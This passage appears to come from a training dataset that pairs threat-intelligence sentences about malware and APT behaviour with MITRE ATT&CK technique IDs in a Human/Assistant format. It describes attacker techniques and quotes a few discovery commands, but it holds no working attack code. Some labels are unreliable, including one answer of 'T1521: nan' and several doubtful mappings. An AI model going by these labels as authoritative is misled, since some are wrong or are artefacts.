to help delete malicious strings from memory.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel has a command to download a file from a remote server to execute.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition, if an adversary places a program called ""net.com"" in the same directory as ""net.exe"", then cmd.exe /C net user will execute ""net.com"" instead of ""net.exe"" due to the order of executable extensions defined under PATHEXT.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JHUHUGIT obtains a list of running processes on the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HISTCONTROL### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used the ShowLocalGroupDetails command to identify administrator, user, and guest accounts on a compromised host.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used post-exploitation tools including RemCom and the Non-sucking Service Manager to execute processes.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deobfuscated, we can see it is the HawkEye Keylogger — Reborn v9, Version=9.0.1.6### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit performs XOR encryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT40 strongly favors web shells for maintaining presence, especially publicly available tools### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can enumerate directories on target machines.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has added a registry key in the hive for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown has the ability to determine if the compromised host is running a 32 or 64 bit OS architecture.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket .### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver installs itself as a new service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VERMIN uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has attempted to bypass UAC and gain elevated administrative privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron exfiltrates data over its email C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can spawn processes with alternate PPIDs.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can launch an instance of itself with administrative rights using runas.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird drops a malicious file alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used a DGA to generate domain names for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pteranodon can use HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet calls LoadLibrary then executes exports from a DLL.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has added created user accounts to local Admin groups.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has used various social media channels to spearphish victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can delete files off the system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use SSL in C2 communication.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can download additional files and tools from its C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RemoteCMD can execute commands remotely by creating a new service on the remote system.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various Remsec .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc lists processes running on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib has the ability to execute shell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used Amazon Web Services to host C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SOUNDBITE communicates via DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used WMI to automate the remote execution of PowerShell scripts.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also adds its second stage payload to the startup programs as “Net Monitor.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use TCP in C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used the Windows API to execute code within a victim's system.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy uses SMTP and POP3 for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to use HTTP in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe can mimic legitimate Windows directories by using the same icons and names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT uses a payload that removes itself after running.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao's proxy implementation ""Agent"" can upgrade the socket in use to a TLS socket.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has collected files from victim machines, including certificates and cookies.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The code comparison specifically shows the HighShell code including a salt variable containing di2zag7wZHTK9YR0NGq, which is not present within the TwoFace code on the left### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DDKONG decodes an embedded configuration using XOR.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many utilities exist that can archive data, including 7-Zip, WinRAR, and WinZip.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has the ability to identify Workgroup membership.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to retrieve information about the OS.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used HTTP and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may place a program called ""net.exe"" within the same directory as example.exe, ""net.exe"" will be run instead of the Windows system utility net.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has used Python scripts to execute payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ACK floods leverage the stateful nature of the TCP protocol.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avenger has the ability to browse files in directories such as Program Files and the Desktop.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit a system or application vulnerability to bypass security features.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can enumerate routine network connections from a compromised host.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM gathered the fully qualified domain names for targeted Exchange servers in the victim's environment.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also query for specific readings from these devices.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can enumerate the permissions associated with Windows groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information Spearphishing Service.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can execute shell commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of Obfuscated Files or Information.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used HTTP over TCP ports 808 and 880 for command and control.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect network configuration data by running ipconfig /all on a victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has used EnumProcesses to identify how many process are running in the environment.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evidence also supports the hypothesis that there is a encryption plugin for victim files (see below)### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke collects Windows account hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SslMM has a hard-coded primary and backup C2 string.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT deletes the Registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has performed process name checks and has monitored applications.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used icons mimicking MS Office files to mask malicious executables.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This strangeness was related to values listed in newer BlackEnergy configuration files### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has created services on remote systems for execution purposes.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used e-mail attachments to lure victims into executing malicious code.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy obfuscates strings with base64 encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create a cloud account to maintain access to victim systems.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The URIs used in the HTTP requests are randomly generated### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Use of servers allows an adversary to stage, launch, and execute an operation.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware used by Ke3chang can run commands on the command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects to establish backdoors for Persistence.### Assistant: T1207: Rogue Domain Controller" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult### Assistant: T1521: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon execution, the initialized file downloads multiple malicious payloads from remote servers### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike includes a capability to modify the ""beacon"" payload to eliminate known signatures or unpacking methods.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can receive and execute commands with cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This document exploited a newer vulnerability, CVE-2017-0199### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EKANS stops database, data backup solution, antivirus, and ICS-related processes.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Implant directory contained in the malicious Flash file### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has disguised its app bundle by adding special characters to the filename and using the icon for legitimate Word documents.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sys10 collects the group name of the logged-in user and sends it to the C2.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,admin@338 actors used the following commands following exploitation of a machine with LOWBALL malware to enumerate user accounts: net user >> %temp%\download net user /domain >> %temp%\download APT1 used the commands net localgroup,net user, and net group to find accounts on the system.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer checks the system for certain Registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can be configured to use DNS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used Window Remote Management to move laterally through a victim network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon attempts to disable UAC remote restrictions by modifying the Registry.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prior to a phish for information or a phish to gain initial access to a system , an adversary must set up the resources for a link target for the spearphishing link.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key SYSTEM\CurrentControlSet\Control\Lsa Name.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to execute shell commands on the compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Client software enables users to access services provided by a server.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Capturing token input may provide temporary access replay the one-time passcode until the next value rollover as well as possibly enabling adversaries to reliably predict future authentication values .### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 Hardware ID used by XAgent to uniquely identify compromised hosts When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can inject itself into running processes on a compromised host.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may collect data stored in the clipboard from users copying information within or between applications.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the tasklist /v command to obtain a list of processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has obtained domains to host their payloads.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke steals credentials from compromised hosts.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The .zip archive attached to the email contains a Windows shortcut (.lnk) file with the Microsoft Internet Explorer logo### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has used cmd /c commands embedded within batch scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can use vssadmin.exe to remove volume shadow copies.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3: FIN7 phishing lure persistence mechanisms Examining Attacker Shortcut Files In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GRIFFON has used sctasks for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has directed users to open URLs hosting malicious content.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has been programmed to sleep outside local business hours .### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can log keystrokes on the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various Windows utilities may be used to execute commands, possibly without invoking cmd.### Assistant: T1202: Indirect Command Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It may be possible to bypass those security mechanisms by renaming the utility prior to utilization .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 , 139 , and 445 enabling full remote access from outside the network.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tracked Commands During observation of the described above “router-PC” CnC we tracked the following commands delivered in the config file before the server went offline### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has collected files and other sensitive information from a compromised network.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can enumerate running software on a targeted system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker adds Registry Run keys to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a feature to perform SYN flood attack on a host.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Suckfly used a signed credential-dumping tool to obtain victim account credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can stage data prior to exfiltration in %APPDATA%\Microsoft\UserSetting and %APPDATA%\Microsoft\UserSetting\MediaCache.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KOMPROGO is capable of retrieving information about the infected system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver collects the victim's IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar can overwrite files with random data before deleting them.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework., net use ### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can collect information about the about the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can identify peripheral devices on targeted systems.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT opens a remote shell to execute commands on the infected system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rundll32.exe can also be used to execute Control Panel Item files through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE 